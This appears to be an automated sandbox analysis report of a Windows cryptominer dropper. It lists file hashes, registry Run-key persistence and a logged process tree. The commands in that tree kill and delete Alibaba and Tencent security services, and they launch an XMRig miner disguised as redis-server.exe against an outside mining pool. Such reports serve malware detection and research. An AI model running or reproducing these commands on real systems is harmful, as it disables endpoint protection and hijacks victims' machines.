Analysis
-
max time kernel
141s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-05-2021 14:34
Static task
static1
Behavioral task
behavioral1
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win10v20210408
General
-
Target
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
-
Size
569KB
-
MD5
c85e27470e88ad0d0449ab68ef18d0a3
-
SHA1
4791330c3acf353772c3d073cc52a619eb4cd7cc
-
SHA256
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
-
SHA512
39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
htttp.exeredis-server.exepid process 3900 htttp.exe 4768 redis-server.exe -
Stops running service(s) 3 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
htttp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe -
Drops file in Windows directory 2 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exedescription ioc process File created C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe File opened for modification C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 860 tasklist.exe 1396 tasklist.exe 1560 tasklist.exe 1820 tasklist.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2288 taskkill.exe 2520 taskkill.exe 4524 taskkill.exe 4608 taskkill.exe 972 taskkill.exe 2960 taskkill.exe 1568 taskkill.exe 2096 taskkill.exe 3112 taskkill.exe 4572 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeredis-server.exedescription pid process Token: SeDebugPrivilege 860 tasklist.exe Token: SeDebugPrivilege 1396 tasklist.exe Token: SeDebugPrivilege 1560 tasklist.exe Token: SeDebugPrivilege 1820 tasklist.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 2520 taskkill.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 3112 taskkill.exe Token: SeDebugPrivilege 4524 taskkill.exe Token: SeDebugPrivilege 4572 taskkill.exe Token: SeDebugPrivilege 4608 taskkill.exe Token: SeDebugPrivilege 972 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeLockMemoryPrivilege 4768 redis-server.exe Token: SeLockMemoryPrivilege 4768 redis-server.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exehtttp.execmd.exedescription pid process target process PID 4804 wrote to memory of 3900 4804 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 4804 wrote to memory of 3900 4804 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 4804 wrote to memory of 3900 4804 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 3900 wrote to memory of 812 3900 htttp.exe cmd.exe PID 3900 wrote to memory of 812 3900 htttp.exe cmd.exe PID 3900 wrote to memory of 812 3900 htttp.exe cmd.exe PID 812 wrote to memory of 860 812 cmd.exe tasklist.exe PID 812 wrote to memory of 860 812 cmd.exe tasklist.exe PID 812 wrote to memory of 860 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1396 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1396 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1396 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1560 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1560 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1560 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1820 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1820 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1820 812 cmd.exe tasklist.exe PID 812 wrote to memory of 1568 812 cmd.exe taskkill.exe PID 812 wrote to memory of 1568 812 cmd.exe taskkill.exe PID 812 wrote to memory of 1568 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2288 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2288 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2288 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2520 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2520 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2520 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2096 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2096 812 cmd.exe taskkill.exe PID 812 wrote to memory of 2096 812 cmd.exe taskkill.exe PID 812 wrote to memory of 3112 812 cmd.exe taskkill.exe PID 812 wrote to memory of 3112 812 cmd.exe taskkill.exe PID 812 wrote to memory of 3112 812 cmd.exe taskkill.exe PID 812 wrote to memory of 3352 812 cmd.exe sc.exe PID 812 wrote to memory of 3352 812 cmd.exe sc.exe PID 812 wrote to memory of 3352 812 cmd.exe sc.exe PID 812 wrote to memory of 3880 812 cmd.exe sc.exe PID 812 wrote to memory of 3880 812 cmd.exe sc.exe PID 812 wrote to memory of 3880 812 cmd.exe sc.exe PID 812 wrote to memory of 4060 812 cmd.exe sc.exe PID 812 wrote to memory of 4060 812 cmd.exe sc.exe PID 812 wrote to memory of 4060 812 cmd.exe sc.exe PID 812 wrote to memory of 4480 812 cmd.exe sc.exe PID 812 wrote to memory of 4480 812 cmd.exe sc.exe PID 812 wrote to memory of 4480 812 cmd.exe sc.exe PID 812 wrote to memory of 4068 812 cmd.exe sc.exe PID 812 wrote to memory of 4068 812 cmd.exe sc.exe PID 812 wrote to memory of 4068 812 cmd.exe sc.exe PID 812 wrote to memory of 4052 812 cmd.exe sc.exe PID 812 wrote to memory of 4052 812 cmd.exe sc.exe PID 812 wrote to memory of 4052 812 cmd.exe sc.exe PID 812 wrote to memory of 1940 812 cmd.exe sc.exe PID 812 wrote to memory of 1940 812 cmd.exe sc.exe PID 812 wrote to memory of 1940 812 cmd.exe sc.exe PID 812 wrote to memory of 4040 812 cmd.exe sc.exe PID 812 wrote to memory of 4040 812 cmd.exe sc.exe PID 812 wrote to memory of 4040 812 cmd.exe sc.exe PID 812 wrote to memory of 4564 812 cmd.exe sc.exe PID 812 wrote to memory of 4564 812 cmd.exe sc.exe PID 812 wrote to memory of 4564 812 cmd.exe sc.exe PID 812 wrote to memory of 4576 812 cmd.exe sc.exe PID 812 wrote to memory of 4576 812 cmd.exe sc.exe PID 812 wrote to memory of 4576 812 cmd.exe sc.exe PID 812 wrote to memory of 4524 812 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\htttp.exe"C:\Windows\htttp.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq Ali_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_service.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_installer.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_service.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_update.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_installer.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Ali_update.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AliHids.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "QPCore"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "QPCore"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QQProtect.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sgagent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BaradAgent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDLive.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exe"C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\run.batMD5
f1cc668d01eeb779b1fc1044541fc1d4
SHA145bd782881b31eb2868fc211b19af2cb627a9d0d
SHA25662fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
SHA512293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
memory/812-117-0x0000000000000000-mapping.dmp
-
memory/860-119-0x0000000000000000-mapping.dmp
-
memory/972-141-0x0000000000000000-mapping.dmp
-
memory/1396-120-0x0000000000000000-mapping.dmp
-
memory/1560-121-0x0000000000000000-mapping.dmp
-
memory/1568-123-0x0000000000000000-mapping.dmp
-
memory/1820-122-0x0000000000000000-mapping.dmp
-
memory/1940-134-0x0000000000000000-mapping.dmp
-
memory/2096-126-0x0000000000000000-mapping.dmp
-
memory/2288-124-0x0000000000000000-mapping.dmp
-
memory/2520-125-0x0000000000000000-mapping.dmp
-
memory/2960-142-0x0000000000000000-mapping.dmp
-
memory/3112-127-0x0000000000000000-mapping.dmp
-
memory/3352-128-0x0000000000000000-mapping.dmp
-
memory/3880-129-0x0000000000000000-mapping.dmp
-
memory/3900-114-0x0000000000000000-mapping.dmp
-
memory/4040-135-0x0000000000000000-mapping.dmp
-
memory/4052-133-0x0000000000000000-mapping.dmp
-
memory/4060-130-0x0000000000000000-mapping.dmp
-
memory/4068-132-0x0000000000000000-mapping.dmp
-
memory/4480-131-0x0000000000000000-mapping.dmp
-
memory/4524-138-0x0000000000000000-mapping.dmp
-
memory/4564-136-0x0000000000000000-mapping.dmp
-
memory/4572-139-0x0000000000000000-mapping.dmp
-
memory/4576-137-0x0000000000000000-mapping.dmp
-
memory/4608-140-0x0000000000000000-mapping.dmp
-
memory/4768-143-0x0000000000000000-mapping.dmp
-
memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmpFilesize
15.4MB
-
memory/4768-147-0x0000020D1E2C0000-0x0000020D1E2E0000-memory.dmpFilesize
128KB